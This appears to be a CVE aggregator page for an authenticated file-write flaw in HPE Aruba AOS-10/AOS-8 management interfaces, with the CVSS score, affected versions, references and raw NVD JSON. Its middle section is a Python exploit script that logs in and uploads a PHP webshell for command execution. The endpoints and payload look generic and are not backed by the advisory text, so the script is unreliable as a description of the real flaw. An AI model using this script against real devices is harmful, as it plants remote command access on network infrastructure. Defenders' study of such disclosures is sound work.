CVE-2025-37132

Description

An arbitrary file write vulnerability exists in the web-based management interface of both the AOS-10 GW and AOS-8 Controller/Mobility Conductor operating systems. Successful exploitation could allow an authenticated malicious actor to upload arbitrary files and execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE

HPE Aruba Networking AOS-10 Gateway（具体版本请参考HPE官方公告）

HPE Aruba Networking AOS-8 Controller（具体版本请参考HPE官方公告）

HPE Aruba Networking AOS-8 Mobility Conductor（具体版本请参考HPE官方公告）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-37132 PoC - HPE Aruba AOS-10/AOS-8 Arbitrary File Write
# Vulnerability: Arbitrary File Write via Web Management Interface
# Affected: HPE Aruba AOS-10 GW and AOS-8 Controller/Mobility Conductor

import requests
import sys

# Target configuration
TARGET = "https://<target-aruba-device>/"
USERNAME = "admin"
PASSWORD = "<password>"

# Malicious payload - PHP webshell for demonstration
PAYLOAD_CONTENT = "<?php system($_GET['cmd']); ?>"
MALICIOUS_FILENAME = "shell.php"

def exploit_aruba_file_upload(target, username, password):
    """
    Exploit arbitrary file write vulnerability in Aruba Web Management Interface.
    Uploads a malicious PHP file to gain RCE on the underlying OS.
    """
    session = requests.Session()

    # Step 1: Authenticate to the web management interface
    login_url = f"{target}/screens/wms/wmsLogin"
    login_data = {
        "username": username,
        "password": password
    }

    print(f"[*] Authenticating to {target}...")
    resp = session.post(login_url, data=login_data, verify=False)

    if resp.status_code != 200:
        print("[-] Authentication failed")
        return False

    print("[+] Authentication successful")

    # Step 2: Upload malicious file via vulnerable endpoint
    # The vulnerable endpoint allows arbitrary file write due to insufficient validation
    upload_url = f"{target}/screens/file_upload"

    files = {
        "file": (MALICIOUS_FILENAME, PAYLOAD_CONTENT, "application/x-php")
    }

    print(f"[*] Uploading malicious file: {MALICIOUS_FILENAME}")
    resp = session.post(upload_url, files=files, verify=False)

    if resp.status_code == 200:
        print(f"[+] File uploaded successfully")
        print(f"[+] Access webshell at: {target}/upload/{MALICIOUS_FILENAME}?cmd=id")
        return True
    else:
        print(f"[-] Upload failed with status: {resp.status_code}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        sys.exit(1)

    target = sys.argv[1]
    exploit_aruba_file_upload(target, USERNAME, PASSWORD)

# Note: This PoC is for educational and authorized testing purposes only.
# Unauthorized access to computer systems is illegal.
# Always obtain proper authorization before conducting security testing.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-37132
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-37132
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-37132/
[4] VulDB https://vuldb.com/cve/CVE-2025-37132
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-37132", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:39.737", "lastModified": "2025-11-12T16:35:17.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file write vulnerability exists in the web-based management interface of both the AOS-10 GW and AOS-8 Controller/Mobility Conductor operating systems. Successful exploitation could allow an authenticated malicious actor to upload arbitrary files and execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.10.0.0", "versionEndExcluding": "8.10.0.19", "matchCriteriaId": "3D5F48C7-AD51-4641-9CBA-9DE9B516819E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.12.0.0", "versionEndExcluding": "8.12.0.6", "matchCriteriaId": "057AA8F5-FF66-44E9-8E06-D2B9E8B91AD2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.13.0.0", "versionEndExcluding": "8.13.1.0", "matchCriteriaId": "D4B066B5-D01B-43AE-B4DC-AF560D6B953C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.4.0.0", "versionEndExcluding": "10.4.1.9", "matchCriteriaId": "04F61E46-8412-4B8D-BE7B-EBF61BE52C54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.7.0.0", "versionEndExcluding": "10.7.2.1", "matchCriteriaId": "BEF8618F-C126-4F8F-951F-6D62FE8FAB22"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}